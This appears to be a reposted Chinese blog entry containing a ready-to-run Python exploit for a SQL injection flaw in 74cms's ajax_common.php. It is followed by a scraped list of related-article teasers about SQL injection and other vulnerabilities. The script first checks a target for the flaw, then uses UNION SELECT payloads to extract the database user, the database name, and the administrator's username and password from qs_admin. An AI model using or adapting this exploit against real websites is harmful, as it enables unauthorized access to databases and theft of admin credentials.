遇到就瞎写了一个:

 1 #!/usr/bin/env python
 2 #encoding:utf-8
 3 #by i3ekr
 4
 5 import requests,optparse,re
 6 parse = optparse.OptionParser(usage="python %prog url")
 7 parse.add_option('-u','--url',dest='url',metavar='urls',help='please input url!!!')
 8 parse.set_defaults(v=1.2)
 9 options,args=parse.parse_args()
10 url = options.url
11
12
13 def check(url):
14     payload = "/plus/ajax_common.php?query=0%27&act=hotword"
15     html = requests.get(url+payload).content
16     if "Query error" in html:
17         print """[+] 漏洞存在
18 [+] WooYun-2015-137002
19 [+] http://www.anquan.us/static/bugs/wooyun-2015-0137002.html
20 -------------------------------------------------------------
21         """
22     else:
23         print "[-] 漏洞不存在"
24         exit()
25
26
27 def attack(url):
28     user = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,user(),3+and+'&act=hotword").content
29     print "[+] "+user
30     database = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,database(),3+and+'&act=hotword").content
31     print "[+] "+database
32     username = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select admin_name from qs_admin),3 and '&act=hotword").content
33     print "[+] "+username
34     password = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select pwd from qs_admin),3 and '&act=hotword").content
35     print "[+] "+password
36
37 def ress(html):
38     res = r"\[\'(.*?)\'\]"
39     ok = re.findall(res,html)[0]
40     print ok
41
42 if __name__ == "__main__":
43     check(url)
44     attack(url)

转载于:https://www.cnblogs.com/nul1/p/9120264.html

74cms 注入exp相关推荐

  1. SQL注入 | exp()函数报错

    0x01原理 当传递一个大于709的值时,函数exp()就会引起一个溢出错误. mysql> select exp(709); +-----------------------+ | exp(7 ...

  2. mysql sleep详解_sql注入详解(二)

    sql注入详解 4.检测方法 首先是判断能不能进行sql注入 是哪种sql注入 (1)数字型 ?id=1 and 1=1 返回成功?id=1 and 1=2 返回失败 这说明是数字型注入,或者叫整型注 ...

  3. CTF-SQL注入入门题型

    文章目录 参考 基础 截取 if条件语句加整数溢出进行盲注 DNS外传数据查询(data exfiltration through DNS channel) sql时间盲注 笛卡尔积 heavy qu ...

  4. x友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...

  5. sql注入详解 一文了解sql注入所有常见方法

    前言 刷完了sqli-labs 对sql注入有了些许认识 在此做个小结与记录 1.什么是sql注入 sql,Structured Query Language,叫做结构化查询语言,管理数据库时用到的一 ...

  6. 用友u8 注入RCE漏洞利用数据

    一.漏洞成因 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.用于SQL注入的POC POST /Proxy HTTP/1.1H ...

  7. 搞dedecms站 找后台的一些经验[转]

    首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIo ...

  8. 日常学习之总结(1机器学习,2jupyter notebook,3语言类,4快捷键,5操作系统,6密码学,7Web安全,8Kali,9正则表达式,10计算机网络,11编程题目)

    本文以总结和归类别人的知识点为学习目标,如有侵权,联系本人,可以删除. 文章目录 第一章 机器学习 1.1 DataFrame 新增列的方法 1.2 推荐训练过程的系统 1.3 安全领域下的机器学习注 ...

  9. 渗透测试sec123笔记

    1.外网打点 1.1端口探测 └─$ sudo masscan 192.168.1.103 -p 1-65535 --rate=100 masscan扫描结果 └─$ nmap -sV 192.168 ...

最新文章

  1. 要不是这本书及时出现,本周真撑不下去…
  2. 学python工资高吗-Python工资一般是多少 看完吓你一跳
  3. nodejs生成多层目录和生成文件的通用方法
  4. OpenCV最基本的测试代码-图像的读取与显示
  5. Android 实现简单的插件化模块化
  6. Andriod anim alpha中的属性介绍
  7. 云原生应用万节点分钟级分发协同实践
  8. Django从理论到实战(part55)--将网站上传到GitHub
  9. gateway 过滤器执行顺序_Gateway网关源码解析—路由(1.1)之RouteDefinitionLocator一览...
  10. 拼多多市值一夜蒸发759亿元,黄峥丝毫不慌...
  11. Asp.Net SignalR - 简单聊天室实现
  12. 以下创建了几个对象_面试题系列第2篇:new String()创建几个对象?
  13. 知识蒸馏 | 综述: 知识的类型
  14. Altium Designer19 生成Gerber文件方法
  15. 软考高级 真题 2015年下半年 信息系统项目管理师 案例分析
  16. Java定时任务调度框架
  17. 计算机维修兴趣小组,计算机兴趣小组章程
  18. python3d坐标系转换_世界坐标系,相机坐标系和图像坐标系的转换(Python)
  19. [滴滴校招]末尾0的个数
  20. Pixelmator for Mac如何使用抠..图的功能

热门文章

  1. oracle 半连接 效率,关于oracle中的半连接
  2. python 分析html_用python的BeautifulSoup分析html
  3. python类加载机制_PHP面向对象自动加载机制原理与用法分析
  4. liferay 学习网站 作者为 胡启稳
  5. 2020厦门大学845数据结构考研考试范围(大纲)和参考书目
  6. MySQL 8.0版本安装后,安装目录下找不到my.ini文件
  7. Learning to rank基本算法小结
  8. 使用Spark/Java读取已开启Kerberos认证的HBase
  9. python数据结构和算法3 栈、队列和排序
  10. 139.00.007 Git学习-Cheat Sheet